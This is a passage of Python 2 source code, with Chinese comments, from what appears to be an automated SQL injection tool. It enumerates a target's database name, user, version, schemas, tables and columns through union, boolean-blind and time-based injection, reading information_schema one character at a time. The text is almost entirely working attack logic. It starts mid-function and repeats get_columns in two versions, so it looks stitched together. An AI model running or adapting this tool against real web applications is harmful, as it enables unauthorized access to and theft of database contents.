logger.debug(
"Content account sqli success...The content_count is %d..." %
content_count)
logger.info("[*] content_count: %d" % content_count)
# 把content account return回去
logger.info("[*] content count: %d" % content_count)
return content_count
def get_now_database(self):
database = ""
logger.debug("The sqlirequest is %s, start sqli database..." % self.sqlirequest)
if self.sqlimethod == "normal":
# 先注database长度
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start database length sqli...")
database_len = normal_injection(select='length(database())', dealpayload=self.dealpayload,
data=self.Data, isCount=True, sqlirequest=self.sqlirequest
)
logger.debug("Database length sqli success...The database_len is %d..." % database_len)
print "[*] database_len: %d" % database_len
# 然后注database
logger.debug("Start database sqli...")
database = normal_injection(select='database()', dealpayload=self.dealpayload,
data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
)
logger.debug("Database sqli success...The database is %s" % database)
print "[*] database: %s" % database
elif self.sqlimethod == "build":
# 如果self.len是未被定义过的,需要test跑一下
if self.len == 0:
self.test(output=0)
# 先注database长度
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start database length sqli...")
retVal = build_injection(select="length(database())",
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isCount=True, sqlirequest=self.sqlirequest)
database_len = int(retVal)
logger.debug("Database length sqli success...The database_len is %d..." % database_len)
print "[*] database_len: %d" % database_len
# logger.debug("Database length sqli payload Queue build success...")
# 再注database
logger.debug("Start database sqli...")
for i in trange(1, database_len+1, leave=False):
retVal = build_injection(select="ascii(mid(database()," + repr(i) + ",1))",
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isStrings=True, sqlirequest=self.sqlirequest)
database += chr(retVal)
logger.debug("Database sqli success...The database is %s" % database)
print "[*] database: %s" % database
elif self.sqlimethod == "time":
# 先注database长度
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start database length sqli...")
retVal = time_injection(select="length(database())",
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isCount=True, sqlirequest=self.sqlirequest)
database_len = int(retVal)
logger.debug("Database length sqli success...The database_len is %d..." % database_len)
print "[*] database_len: %d" % database_len
# logger.debug("Database length sqli payload Queue build success...")
# 再注database
logger.debug("Start database sqli...")
for i in trange(database_len, leave=False):
retVal = time_injection(select="ascii(mid(database()," + repr(i + 1) + ",1))",
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isStrings=True, sqlirequest=self.sqlirequest)
database += chr(retVal)
logger.debug("Database sqli success...The database is %s" % database)
print "[*] database: %s" % database
def get_database(self):
logger.debug("The sqlirequest is %s, start sqli databases..." % self.sqlirequest)
if self.sqlimethod == "normal":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start database amount sqli...")
# 先注databases的数量
databases_number = normal_injection(select='COUNT(`SCHEMA_NAME`)',
source='information_schema.SCHEMATA',
dealpayload=self.dealpayload,
data=self.Data, isCount=True, sqlirequest=self.sqlirequest
)
logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number)
print "[*] databases_number: %d" % databases_number
# 每个循环跑一次databases的数据
for i in trange(int(databases_number), desc="Database sqli...", leave=False, disable=True):
# 首先是database name的长度
logger.debug("Start %dth database length sqli..." % (i + 1))
databases_name_len = normal_injection(select='length(`SCHEMA_NAME`)',
source='information_schema.SCHEMATA',
limit=i,
dealpayload=self.dealpayload,
data=self.Data, isCount=True, sqlirequest=self.sqlirequest
)
logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len))
logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len))
# 然后注database name
logger.debug("Start %dth database name sqli..." % (i + 1))
databases_name = normal_injection(select='`SCHEMA_NAME`',
source='information_schema.SCHEMATA', limit=i,
dealpayload=self.dealpayload,
data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
)
logger.debug(
"%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name))
# 把databases_name 中不是information_schema插入列表
if databases_name != "information_schema":
self.databases_name.append(databases_name)
logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name))
elif self.sqlimethod == "build":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start database amount sqli...")
retVal = build_injection(select="COUNT(`SCHEMA_NAME`)",
source="information_schema.SCHEMATA",
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isCount=True, sqlirequest=self.sqlirequest)
databases_number = int(retVal)
logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number)
logger.info("[*] databases_number: %d" % databases_number)
for i in range(0, int(databases_number)):
logger.debug("Start %dth database length sqli..." % (i + 1))
# 然后注databases_name 的 length
retVal = build_injection(select="length(`SCHEMA_NAME`)",
source="information_schema.SCHEMATA",
limit=i,
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isCount=True, sqlirequest=self.sqlirequest)
databases_name_len = int(retVal)
logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len))
logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len))
# 然后注databases名字
# 清空database_name
databases_name = ""
logger.debug("Start %dth database sqli..." % (i + 1))
for j in trange(int(databases_name_len), desc='%dth Database sqli' % (i + 1), leave=False):
retVal = build_injection(select="ascii(substring(`SCHEMA_NAME`," + repr(j + 1) + ",1))",
source="information_schema.SCHEMATA",
limit=i,
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isStrings=True, sqlirequest=self.sqlirequest)
databases_name += chr(retVal)
logger.debug(
"%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name))
# 把databases_name 中不是information_schema插入列表
if databases_name != "information_schema":
self.databases_name.append(databases_name)
logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name))
elif self.sqlimethod == "time":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start database amount sqli...")
retVal = time_injection(select="COUNT(`SCHEMA_NAME`)",
source="information_schema.SCHEMATA",
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isCount=True, sqlirequest=self.sqlirequest)
databases_number = int(retVal)
logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number)
logger.info("[*] databases_number: %d" % databases_number)
for i in range(0, int(databases_number)):
logger.debug("Start %dth database length sqli..." % (i + 1))
# 然后注databases_name 的 length
retVal = time_injection(select="length(`SCHEMA_NAME`)",
source="information_schema.SCHEMATA",
limit=i,
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isCount=True, sqlirequest=self.sqlirequest)
databases_name_len = int(retVal)
logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len))
logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len))
# 然后注databases名字
# 清空databases_name
databases_name = ""
logger.debug("Start %dth database sqli..." % (i + 1))
for j in trange(int(databases_name_len), desc='%dth Database sqli' % (i + 1), leave=False):
retVal = time_injection(select="ascii(substring(`SCHEMA_NAME`," + repr(j + 1) + ",1))",
source="information_schema.SCHEMATA",
limit=i,
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isStrings=True, sqlirequest=self.sqlirequest)
databases_name += chr(retVal)
logger.debug(
"%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name))
# 把databases_name 中不是information_schema插入列表
if databases_name != "information_schema":
self.databases_name.append(databases_name)
logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name))
databases_name = ','.join(self.databases_name)
print "[*] databases_name list: " + databases_name
def get_user(self):
user = ""
logger.debug("The sqlirequest is %s, start sqli user..." % self.sqlirequest)
if self.sqlimethod == "normal":
# 先注user长度
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start user length sqli...")
user_len = normal_injection(select='length(user())', dealpayload=self.dealpayload,
data=self.Data, isCount=True, sqlirequest=self.sqlirequest
)
logger.debug("User length sqli success...The user_len is %d..." % user_len)
print "[*] user_len: %d" % user_len
# 然后注user
logger.debug("Start user sqli...")
user = normal_injection(select='user()', dealpayload=self.dealpayload,
data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
)
logger.debug("User sqli success...The user is %s" % user)
print "[*] user: %s" % user
elif self.sqlimethod == "build":
# 先注user长度
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start user length sqli...")
# logger.debug("Start user length sqli payload Queue build...")
retVal = build_injection(select="length(user())",
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isCount=True, sqlirequest=self.sqlirequest)
user_len = int(retVal)
logger.debug("User length sqli success...The user_len is %d..." % user_len)
print "[*] user_len: %d" % user_len
# logger.debug("user length sqli payload Queue build success...")
# 再注user
logger.debug("Start user sqli...")
for i in trange(1, user_len+1, leave=False):
retVal = build_injection(select="ascii(mid(user()," + repr(i) + ",1))",
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isStrings=True, sqlirequest=self.sqlirequest)
user += chr(retVal)
logger.debug("User sqli success...The user is %s" % user)
print "[*] user: %s" % user
elif self.sqlimethod == "time":
# 先注user长度
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start user length sqli...")
retVal = time_injection(select="length(user())",
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isCount=True, sqlirequest=self.sqlirequest)
user_len = int(retVal)
logger.debug("User length sqli success...The user_len is %d..." % user_len)
print "[*] user_len: %d" % user_len
# logger.debug("user length sqli payload Queue build success...")
# 再注user
logger.debug("Start user sqli...")
for i in trange(user_len, leave=False):
retVal = time_injection(select="ascii(mid(user()," + repr(i + 1) + ",1))",
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isStrings=True, sqlirequest=self.sqlirequest)
user += chr(retVal)
logger.debug("user sqli success...The user is %s" % user)
print "[*] user: %s" % user
def get_version(self):
version = ""
logger.debug("The sqlirequest is %s, start sqli version..." % self.sqlirequest)
if self.sqlimethod == "normal":
# 先注version长度
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
version_len = normal_injection(select='length(version())', dealpayload=self.dealpayload,
data=self.Data, isCount=True, sqlirequest=self.sqlirequest
)
logger.debug("Version length sqli success...The version_len is %d..." % version_len)
print "[*] version_len: %d" % version_len
# 然后注version
logger.debug("Start database sqli...")
version = normal_injection(select='version()', dealpayload=self.dealpayload,
data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
)
logger.debug("Version sqli success...The version is %s" % version)
print "[*] version: %s" % version
elif self.sqlimethod == "build":
# 先注version长度
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start version length sqli...")
retVal = build_injection(select="length(version())",
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isCount=True, sqlirequest=self.sqlirequest)
version_len = int(retVal)
logger.debug("Version length sqli success...The version_len is %d..." % version_len)
print "[*] version_len: %d" % version_len
# logger.debug("Version length sqli payload Queue build success...")
# 再注version
logger.debug("Start version sqli...")
for i in trange(1, version_len+1, leave=False):
retVal = build_injection(select="ascii(mid(version()," + repr(i) + ",1))",
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isStrings=True, sqlirequest=self.sqlirequest)
version += chr(retVal)
logger.debug("version sqli success...The version is %s" % version)
print "[*] version: %s" % version
elif self.sqlimethod == "time":
# 先注version长度
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start version length sqli...")
retVal = time_injection(select="length(version())",
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isCount=True, sqlirequest=self.sqlirequest)
version_len = int(retVal)
logger.debug("Version length sqli success...The version_len is %d..." % version_len)
print "[*] version_len: %d" % version_len
# 再注version
logger.debug("Start version sqli...")
for i in trange(version_len, leave=False):
retVal = time_injection(select="ascii(mid(version()," + repr(i + 1) + ",1))",
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isStrings=True, sqlirequest=self.sqlirequest)
version += chr(retVal)
logger.debug("Version sqli success...The version is %s" % version)
print "[*] version: %s" % version
def get_columns(self):
# 若tables_name未设置,则全跑一遍
if len(self.tables_name) == 0:
SqliTables.get_tables(self)
# 首先是每个database_name
for database_name in self.tables_name:
# 每个databases_name声明为一个字典
self.columns_name[database_name] = {}
# 每个table_name需要跑一次columns_name
for table_name in self.tables_name[database_name]:
# 每个table_name中的columns_name声明为一个列表储存
columns_name = []
# 开始跑columns_name
logger.debug(
"Start sqli databases %s's tables %s's columns..." %
(database_name, table_name))
# 先GET
if self.sqlirequest == "GET":
logger.debug(
"The sqlirequest is %s, start sqli columns..." %
self.sqlirequest)
if self.sqlimethod == "normal":
logger.debug("The sqlimethod is %s..." %
self.sqlimethod)
logger.debug("Start table's %s column amount sqli..." %
table_name)
# 先注columns的数量
columns_number = normal_injection(
select='COUNT(*)',
source="information_schema.columns",
conditions="table_name = '" + table_name +
"' && table_schema = '" + database_name + "'",
dealpayload=self.dealpayload,
data=self.Data,
isCount=True,
sqlirequest=self.sqlirequest)
logger.debug(
"Columns account sqli success...The columns_number is %d..."
% columns_number)
logger.info("[*] columns_number: %d" % columns_number)
# 每个循环跑一次columns的数据
for i in trange(int(columns_number),
desc="Column sqli...",
leave=False,
disable=True):
# 首先是column name的长度
logger.debug("Start %dth column length sqli..." %
(i + 1))
column_name_len = normal_injection(
select='length(column_name)',
source="information_schema.columns",
conditions="table_name = '" + table_name +
"' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
isCount=True,
sqlirequest=self.sqlirequest)
logger.debug(
"%dth Column name length sqli success...The column_name_len is %d..."
% ((i + 1), column_name_len))
logger.info("[*] %dth column_name_len: %d" %
((i + 1), column_name_len))
# 然后注columns name
column_name = normal_injection(
select='column_name',
source='information_schema.columns',
conditions="table_name = '" + table_name +
"' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
isStrings=True,
sqlirequest=self.sqlirequest)
logger.debug(
"%dth Column name sqli success...The column_name is %s..."
% ((i + 1), column_name))
# 把columns_name插入列表
columns_name.append(column_name)
logger.info("[*] %dth column_name: %s" %
((i + 1), column_name))
elif self.sqlimethod == "build":
logger.debug("The sqlimethod is %s..." %
self.sqlimethod)
logger.debug("Start table's %s column amount sqli..." %
table_name)
retVal = build_injection(
select="COUNT(column_name)",
source="information_schema.columns",
conditions="table_name = '" + table_name +
"' && table_schema = '" + database_name + "'",
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isCount=True,
sqlirequest=self.sqlirequest)
columns_number = int(retVal)
logger.debug(
"Columns account sqli success...The columns_number is %d..."
% columns_number)
logger.info("[*] columns_number: %d" % columns_number)
for i in range(0, int(columns_number)):
# 然后注 columns_number 的 length
logger.debug("Start %dth column length sqli..." %
(i + 1))
retVal = build_injection(
select="length(column_name)",
source="information_schema.columns",
conditions="table_name = '" + table_name +
"' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isCount=True,
sqlirequest=self.sqlirequest)
column_name_len = int(retVal)
logger.debug(
"%dth Column name length sqli success...The column_name_len is %d..."
% ((i + 1), column_name_len))
logger.info("[*] %dth column_name_len: %d" %
((i + 1), column_name_len))
# 然后注column名字
# 清空column_name
column_name = ""
logger.debug("Start %dth column sqli..." % (i + 1))
for j in trange(int(column_name_len),
desc='%dth Column sqli' % (i + 1),
leave=False):
retVal = build_injection(
select="ascii(substring(column_name," +
repr(j + 1) + ",1))",
source="information_schema.columns",
conditions="table_name = '" + table_name +
"' && table_schema = '" + database_name +
"'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isStrings=True,
sqlirequest=self.sqlirequest)
column_name += chr(retVal)
logger.debug(
"%dth Column name sqli success...The column_name is %s..."
% ((i + 1), column_name))
# 把columns_name插入列表
columns_name.append(column_name)
logger.info("[*] %dth column_name: %s" %
((i + 1), column_name))
elif self.sqlimethod == "time":
logger.debug("The sqlimethod is %s..." %
self.sqlimethod)
logger.debug("Start table's %s column amount sqli..." %
table_name)
retVal = time_injection(
select="COUNT(column_name)",
source="information_schema.columns",
conditions="table_name = '" + table_name +
"' && table_schema = '" + database_name + "'",
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isCount=True,
sqlirequest=self.sqlirequest)
columns_number = int(retVal)
logger.debug(
"Columns account sqli success...The columns_number is %d..."
% columns_number)
logger.info("[*] columns_number: %d" % columns_number)
for i in range(0, int(columns_number)):
# 然后注 columns_number 的 length
logger.debug("Start %dth column length sqli..." %
(i + 1))
retVal = time_injection(
select="length(column_name)",
source="information_schema.columns",
conditions="table_name = '" + table_name +
"' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isCount=True,
sqlirequest=self.sqlirequest)
column_name_len = int(retVal)
logger.debug(
"%dth Column name length sqli success...The column_name_len is %d..."
% ((i + 1), column_name_len))
logger.info("[*] %dth column_name_len: %d" %
((i + 1), column_name_len))
# 然后注columns名字
# 清空column_name
column_name = ""
logger.debug("Start %dth column sqli..." % (i + 1))
for j in trange(int(column_name_len),
desc='%dth Column sqli' % (i + 1),
leave=False):
retVal = time_injection(
select="ascii(substring(column_name," +
repr(j + 1) + ",1))",
source="information_schema.columns",
conditions="table_name = '" + table_name +
"' && table_schema = '" + database_name +
"'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isStrings=True,
sqlirequest=self.sqlirequest)
column_name += chr(retVal)
logger.debug(
"%dth Column name sqli success...The column_name is %s..."
% ((i + 1), column_name))
# 把columns_name插入列表
columns_name.append(column_name)
logger.info("[*] %dth column_name: %s" %
((i + 1), column_name))
# 然后是post
elif self.sqlirequest == "POST":
logger.debug(
"The sqlirequest is %s, start sqli tables..." %
self.sqlirequest)
if self.sqlimethod == "normal":
logger.debug("The sqlimethod is %s..." %
self.sqlimethod)
logger.debug("Start table's %s column amount sqli..." %
table_name)
# 先注columns的数量
columns_number = normal_injection(
select='COUNT(*)',
source="information_schema.columns",
conditions="table_name = '" + table_name +
"' && table_schema = '" + database_name + "'",
dealpayload=self.dealpayload,
data=self.Data,
isCount=True,
sqlirequest=self.sqlirequest)
logger.debug(
"Columns account sqli success...The columns_number is %d..."
% columns_number)
logger.info("[*] columns_number: %d" % columns_number)
# 每个循环跑一次columns的数据
for i in trange(int(columns_number),
desc="Column sqli...",
leave=False,
disable=True):
# 首先是column name的长度
logger.debug("Start %dth column length sqli..." %
(i + 1))
column_name_len = normal_injection(
select='length(column_name)',
source="information_schema.columns",
conditions="table_name = '" + table_name +
"' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
isCount=True,
sqlirequest=self.sqlirequest)
logger.debug(
"%dth Column name length sqli success...The column_name_len is %d..."
% ((i + 1), column_name_len))
logger.info("[*] %dth column_name_len: %d" %
((i + 1), column_name_len))
# 然后注columns_name
column_name = normal_injection(
select='column_name',
source='information_schema.columns',
conditions="table_name = '" + table_name +
"' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
isStrings=True,
sqlirequest=self.sqlirequest)
logger.debug(
"%dth Column name sqli success...The column_name is %s..."
% ((i + 1), column_name))
# 把columns_name插入列表
columns_name.append(column_name)
logger.info("[*] %dth column_name: %s" %
((i + 1), column_name))
elif self.sqlimethod == "build":
logger.debug("The sqlimethod is %s..." %
self.sqlimethod)
logger.debug("Start table's %s column amount sqli..." %
table_name)
retVal = build_injection(
select="COUNT(column_name)",
source="information_schema.columns",
conditions="table_name = '" + table_name +
"' && table_schema = '" + database_name + "'",
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isCount=True,
sqlirequest=self.sqlirequest)
columns_number = int(retVal)
logger.debug(
"Columns account sqli success...The columns_number is %d..."
% columns_number)
logger.info("[*] columns_number: %d" % columns_number)
for i in range(0, int(columns_number)):
# 然后注 columns_number 的 length
logger.debug("Start %dth column length sqli..." %
(i + 1))
retVal = build_injection(
select="length(column_name)",
source="information_schema.columns",
conditions="table_name = '" + table_name +
"' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isCount=True,
sqlirequest=self.sqlirequest)
column_name_len = int(retVal)
logger.debug(
"%dth Column name length sqli success...The column_name_len is %d..."
% ((i + 1), column_name_len))
logger.info("[*] %dth column_name_len: %d" %
((i + 1), column_name_len))
# 然后注columns名字
# 清空column_name
column_name = ""
logger.debug("Start %dth column sqli..." % (i + 1))
for j in trange(int(column_name_len),
desc='%dth Column sqli' % (i + 1),
leave=False):
retVal = build_injection(
select="ascii(substring(column_name," +
repr(j + 1) + ",1))",
source="information_schema.columns",
conditions="table_name = '" + table_name +
"' && table_schema = '" + database_name +
"'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
lens=self.len,
isStrings=True,
sqlirequest=self.sqlirequest)
column_name += chr(retVal)
logger.debug(
"%dth Column name sqli success...The column_name is %s..."
% ((i + 1), column_name))
# 把columns_name插入列表
columns_name.append(column_name)
logger.info("[*] %dth column_name: %s" %
((i + 1), column_name))
elif self.sqlimethod == "time":
logger.debug("The sqlimethod is %s..." %
self.sqlimethod)
logger.debug("Start table's %s column amount sqli..." %
table_name)
retVal = time_injection(
select="COUNT(column_name)",
source="information_schema.columns",
conditions="table_name = '" + table_name +
"' && table_schema = '" + database_name + "'",
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isCount=True,
sqlirequest=self.sqlirequest)
columns_number = int(retVal)
logger.debug(
"Columns account sqli success...The columns_number is %d..."
% columns_number)
logger.info("[*] columns_number: %d" % columns_number)
for i in range(0, int(columns_number)):
# 然后注 columns_number 的 length
logger.debug("Start %dth column length sqli..." %
(i + 1))
retVal = time_injection(
select="length(column_name)",
source="information_schema.columns",
conditions="table_name = '" + table_name +
"' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isCount=True,
sqlirequest=self.sqlirequest)
column_name_len = int(retVal)
logger.debug(
"%dth Column name length sqli success...The column_name_len is %d..."
% ((i + 1), column_name_len))
logger.info("[*] %dth column_name_len: %d" %
((i + 1), column_name_len))
# 然后注columns名字
# 清空column_name
column_name = ""
logger.debug("Start %dth column sqli..." % (i + 1))
for j in trange(int(column_name_len),
desc='%dth Column sqli' % (i + 1),
leave=False):
retVal = time_injection(
select="ascii(substring(column_name," +
repr(j + 1) + ",1))",
source="information_schema.columns",
conditions="table_name = '" + table_name +
"' && table_schema = '" + database_name +
"'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data,
times=self.time,
isStrings=True,
sqlirequest=self.sqlirequest)
column_name += chr(retVal)
logger.debug(
"%dth Column name sqli success...The column_name is %s..."
% ((i + 1), column_name))
# 把columns_name插入列表
columns_name.append(column_name)
logger.info("[*] %dth column_name: %s" %
((i + 1), column_name))
# 把注入得到的columns_name列表转为元组
self.columns_name[database_name][table_name] = tuple(
columns_name)
logger.info("Sqli result:")
# 输出所有的列名
for database_name in self.columns_name:
tables_name = ""
for table_name in self.columns_name[database_name]:
tables_name += table_name
tables_name += ','
columns_name = ""
for column_name in self.columns_name[database_name][
table_name]:
columns_name += column_name
columns_name += ','
logger.info("Table %s has columns %s", table_name,
columns_name)
logger.info("Database %s has tables %s", database_name,
tables_name)
print "[*]Columns list:", self.columns_name
def get_tables(self):
# 若databases_name未设置,就跑一下
if len(self.databases_name) == 0:
logger.debug("Set the parameters of the self.databases_name...")
SqliDatabases.get_database(self)
# 每个databases_name需要跑一次tables_name
for database_name in self.databases_name:
# 开始跑database_name
logger.debug("Start sqli databases %s's tables_name" % database_name)
tables_name = []
logger.debug("The sqlirequest is %s, start sqli tables..." % self.sqlirequest)
if self.sqlimethod == "normal":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table amount sqli...")
# 先注tables的数量
tables_number = normal_injection(select='COUNT(*)',
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
dealpayload=self.dealpayload,
data=self.Data, isCount=True, sqlirequest=self.sqlirequest
)
logger.debug("Table account sqli success...The tables_number is %d..." % tables_number)
print "[*] tables_number: %d" % tables_number
# 每个循环跑一次tables的数据
for i in trange(int(tables_number), desc="Table sqli...", leave=False, disable=True):
# 首先是tablename的长度
logger.debug("Start %dth table length sqli..." % (i + 1))
table_name_len = normal_injection(select='length(`table_name`)',
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data, isCount=True, sqlirequest=self.sqlirequest
)
logger.debug("%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len))
logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len))
# 然后注tablename
logger.debug("Start %dth table name sqli..." % (i + 1))
table_name = normal_injection(select='`table_name`',
source='information_schema.tables',
conditions="table_schema = '" + database_name + "'", limit=i,
dealpayload=self.dealpayload,
data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
)
logger.debug("%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name))
# 把table_name插入列表
tables_name.append(table_name)
logger.info("[*] %dth table_name: %s" % ((i + 1), table_name))
elif self.sqlimethod == "build":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table amount sqli...")
retVal = build_injection(select="COUNT(`table_name`)",
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isCount=True, sqlirequest=self.sqlirequest)
tables_number = int(retVal)
logger.debug("Tables amount sqli success...The tables_number is %d..." % tables_number)
logger.info("[*] tables_number: %d" % tables_number)
for i in range(0, int(tables_number)):
# 然后注tables_name 的 length
logger.debug("Start %dth table length sqli..." % (i + 1))
retVal = build_injection(select="length(`table_name`)",
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isCount=True, sqlirequest=self.sqlirequest)
table_name_len = int(retVal)
logger.debug("%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len))
logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len))
# 然后注tables名字
# 清空table_name
table_name = ""
logger.debug("Start %dth table sqli..." % (i + 1))
for j in trange(int(table_name_len), desc='%dth Table sqli' % (i + 1), leave=False):
retVal = build_injection(select="ascii(substring(`table_name`," + repr(j + 1) + ",1))",
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload, data=self.Data, lens=self.len,
isStrings=True, sqlirequest=self.sqlirequest)
table_name += chr(retVal)
logger.debug("%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name))
# 把table_name插入列表
tables_name.append(table_name)
logger.info("[*] %dth table_name: %s" % ((i + 1), table_name))
elif self.sqlimethod == "time":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table amount sqli...")
retVal = time_injection(select="COUNT(`table_name`)",
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isCount=True, sqlirequest=self.sqlirequest)
tables_number = int(retVal)
logger.debug("Tables amount sqli success...The tables_number is %d..." % tables_number)
logger.info("[*] tables_number: %d" % tables_number)
for i in range(0, int(tables_number)):
# 然后注tables_number 的length
logger.debug("Start %dth table length sqli..." % (i + 1))
retVal = time_injection(select="length(`table_name`)",
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isCount=True, sqlirequest=self.sqlirequest)
table_name_len = int(retVal)
logger.debug("%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len))
logger.info("[*] %dth table_name_len: %d" % ((i + 1), table_name_len))
# 然后注tables名字
# 清空table_name
table_name = ""
logger.debug("Start %dth table sqli..." % (i + 1))
for j in trange(int(table_name_len), desc='%dth Table sqli' % (i + 1), leave=False):
retVal = time_injection(select="ascii(substring(`table_name`," + repr(j + 1) + ",1))",
source="information_schema.tables",
conditions="table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload, data=self.Data, times=self.time,
isStrings=True, sqlirequest=self.sqlirequest)
table_name += chr(retVal)
logger.debug("%dth Table name sqli success...The table_name is %s..." % ((i + 1), table_name))
# 把tables_name插入列表
tables_name.append(table_name)
logger.info("[*] %dth table_name: %s" % ((i + 1), table_name))
self.tables_name[database_name] = tuple(tables_name)
print "[*] tables_name list: ", self.tables_name
def get_columns(self):
# 若tables_name未设置,则全跑一遍
if len(self.tables_name) == 0:
SqliTables.get_tables(self)
# 首先是每个database_name
for database_name in self.tables_name:
# 每个databases_name声明为一个字典
self.columns_name[database_name]={}
# 每个table_name需要跑一次columns_name
for table_name in self.tables_name[database_name]:
# 每个table_name中的columns_name声明为一个列表储存
columns_name = []
# 开始跑columns_name
logger.debug("Start sqli databases %s's tables %s's columns..." % (database_name, table_name))
logger.debug("The sqlirequest is %s, start sqli columns..." % self.sqlirequest)
if self.sqlimethod == "normal":
logger.debug("The sqlimethod is %s..." % self.sqlimethod)
logger.debug("Start table's %s column amount sqli..." % table_name)
# 先注columns的数量
columns_number = normal_injection(select='COUNT(*)',
source="information_schema.columns",
conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
dealpayload=self.dealpayload,
data=self.Data, isCount=True, sqlirequest=self.sqlirequest
)
logger.debug("Columns account sqli success...The columns_number is %d..." % columns_number)
logger.info("[*] columns_number: %d" % columns_number)
# 每个循环跑一次columns的数据
for i in trange(int(columns_number), desc="Column sqli...", leave=False, disable=True):
# 首先是column name的长度
logger.debug("Start %dth column length sqli..." % (i + 1))
column_name_len = normal_injection(select='length(`column_name`)',
source="information_schema.columns",
conditions="table_name = '" + table_name + "' && table_schema = '" + database_name + "'",
limit=i,
dealpayload=self.dealpayload,
data=self.Data, isCount=True, sqlirequest=self.sqlirequest
)
